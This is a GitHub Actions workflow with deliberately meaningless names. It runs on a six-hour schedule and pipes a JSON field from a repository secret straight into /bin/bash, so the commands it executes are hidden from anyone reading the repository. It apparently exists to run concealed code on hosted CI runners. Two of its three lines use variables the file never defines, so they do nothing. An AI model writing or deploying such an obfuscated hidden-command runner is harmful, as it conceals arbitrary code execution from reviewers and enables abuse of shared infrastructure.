name: behindikea

on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: behindikea
        env:
          afi4231: ${{ secrets.afi4231 }}
        run: |
          echo $afi4231 | jq -r .y81094 | /bin/bash
          echo $tzduh65636 | jq -r .m6346 | /bin/bash
          echo $w68122 | jq -r .lv5418 | /bin/bash

